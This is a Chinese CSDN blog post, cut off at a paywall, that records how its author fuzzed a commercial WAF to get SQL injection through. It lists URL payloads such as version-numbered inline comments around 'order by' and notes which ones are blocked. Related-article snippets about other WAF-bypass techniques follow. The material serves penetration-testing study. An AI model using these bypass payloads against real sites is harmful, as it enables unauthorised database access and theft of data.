【WEB安全】某waf实战SQL注入绕过fuzz过程

最新推荐文章于 2022-04-21 23:50:17 发布
最新推荐文章于 2022-04-21 23:50:17 发布
阅读量419 收藏 1
点赞数
文章标签: 数据库 xss sql php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yijinbaiyi/article/details/103962771
版权
本文介绍了在某WAF环境下进行SQL注入的实战过程,通过Fuzz测试发现WAF对特定关键词的敏感性。利用内联注释、分隔符和数字替换等方法成功绕过WAF拦截,实现SQL注入。具体包括order by、union select等场景的绕过策略。
摘要由CSDN通过智能技术生成

【WEB安全】某waf实战SQL注入绕过fuzz过程

#01 环境简介

服务器:windows2008 R2

软件:phpstudy20180211

php 5.4.45

mysql 5.5.53

某锁win_3.1.18.13服务端版本

#02 Fuzz过程

以基于union注入为例

fuzz order by

过程如下:
?id=1’ order --+ 不拦截

?id=1’ order by --+ 拦截
在这里插入图片描述
在这里插入图片描述
nna那应该是waf匹配了order+by

?id=1’ order /!by/ --+ 拦截
?id=1’ order /!60000by/ 1 --+ 不拦截,但是报错
在这里插入图片描述
翻译过来:您的SQL语法有误; 检查与您的MySQL服务器版本相对应的手册,以在第1行的’1-'LIMIT 0,1’附近使用正确的语法

那么猜测是要低于mysql的版本吗?(我在fuzz某狗的时候里面的数字要高于50000以上,可能某锁要低于mysql版本,便随便试了个200000)

?id=1’ order /!20000by/ 3 --+ 不拦截,且执行成

最低0.47元/天 解锁文章
yijin-南渊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Access联合注入实战/Cookie注入/简单WAF绕过
weixin_45118086的博客
03-20 685
Access联合注入实战/Cookie注入/简单WAF绕过 首先来说一下Access与MySQL在语法上存在的小差别。 1、在MySQL中,使用select1,2,3语句配合联合注入,但是在Access中,select语句背后必须跟着表名,此方法不再适用 2、在MySQL中,使用limit语句将union后的查询结果放在前面显示,但是在Access中,越晚查询的结果反而越排在前面,无需使用limit进行特殊处理。 靶场地址:靶场 注意,在cookie注入中,用+代替空格 判断注入点 打开新闻后,界面如下:
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
基于locate函数的的时间盲注
weixin_45983744的博客
12-18 227
QQ交流群:876554035 1.在盲注中,字符串截取函数我们一般使用substr或者substring(两者一样),但是还有一个冷门函数locate函数可以截取实现盲注。 2.那么我们先来了解这个函数的用法,locate(substr,str,pos) 返回子串 substr 在字符串 str 中的第 pos 位置后第一次出现的位置。如果 substr 不在 str 中返回 0。看下图。 ...
Acesss数据库手工绕过通用代码防注入系统
weixin_34124939的博客
05-19 244
Acesss数据库手工绕过通用代码防注入系统By antian365 残枫 simeon    ***过程就是各种安全技术的再现过程,本次***从SQL注入点的发现到绕过sql注入通用代码的防注入,可以说是打开了一扇门,通过sql注入获取管理员密码,获取数据库,如果在条件允许的情况下是完全可以获取webshell。在本文中还对access数据库获取webshell等关键技术进行了总结。1.1获取目...
mysql报错注入_项目实战 | 报错SQL注入绕过WAF
weixin_33560311的博客
01-01 270
文章来源:安译Sec报错的存在一个有趣的点:http://domain.com/xxx/news.php?id=xxx打开URL时,遇到了MySQL错误。Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27访问端点时出现MySQL错误我们知道可以执行一些基...
记一次Microsoft Access 数据库的注入与waf绕过
weixin_48421613的博客
10-14 4419
Microsoft Access Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软OFFICE的一个成员, 在包括专业版和更高版本的office版本里面被单独出售。== 2018年9月25日,最新的
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一...SQL 注入绕过 WAF 和过滤机制是一个非常复杂的过程,需要对 WAF 的常见特征和特点有充分的了解,并且需要对多种绕过技术有充分的了解和掌握。
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
SQL注入WAF小结
05-08
本文将对几种常见的SQL注入绕过WAF的方法进行详细说明。 #### 二、SQL注入类型 1. **GET注入**:通常发生在URL查询参数中。 2. **POST注入**:发生在HTTP POST请求的数据体中。 3. **COOKIE注入**:利用Cookie中的...
分块传输绕过WAF进行SQL注入1
08-03
SQL注入攻击的场景中,分块传输编码可能被用来绕过Web应用防火墙(WAF)。由于WAF通常基于预定义的规则来检测和阻止恶意请求,它可能无法正确解析分块编码的请求体,从而忽略了其中可能存在的恶意SQL语句。攻击者...
SQL注入绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的
wAF绕过测试
cnbird's blog
04-13 961
https://github.com/ironbee/waf-research
fuzzwaf
qq_41048303的博客
11-17 2017
fuzzwaf(SQL注入) 1.fuzz.py import requests import sys fuzz_zs = ['/*', '*/', '/*!', '/**/', '?', '/', '*', '=', '`', '!', '%', '.', '-', '+'] fuzz_sz = [''] fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j","%0k","%0l","%0m","
SQL注入过滤字符的Fuzz脚本测试
末初的CSDN博客
08-18 3025
Get.php <!DOCTYPE html> <html> <head> <title>Sql Waf Test</title> </head> <body> <div style="text-align:center;"> <form method="GET" action=""> <h1>Insert Data</h1> <input type="te
sqlmap之(五)----Cookie注入实战
你身后的人
04-21 1185
(1) cookie注入,猜解表  [html] view plain copy sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2    do you want to URL encode cookie values (implementation specific)? [Y/n...
怎么绕过论坛回复_实战渗透:Mssql注入绕过正则思路分享
weixin_39605997的博客
11-27 288
0x00前言:在一次渗透测试中,遇到了拥有SA权限的Mssql数据库,就想到了命令执行。可惜了臣服在了数据库的淫威之下,想到点思路但是却又没有实现出来。希望大大们看完文章之后能给点意见。0x01 测试过程:1、注入思路:检测注入==》获取数据库版本==》查看权限==》查看是否开启扩展==》查看是否支持堆叠==》堆叠注入-执行命令2、判断注入点看到一个搜索框检测是否存在注入 ...
渗透测试-SQL注入Fuzz绕过WAF
lza20001103的博客
04-21 4393
渗透测试-SQL注入Fuzz绕过WAF
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值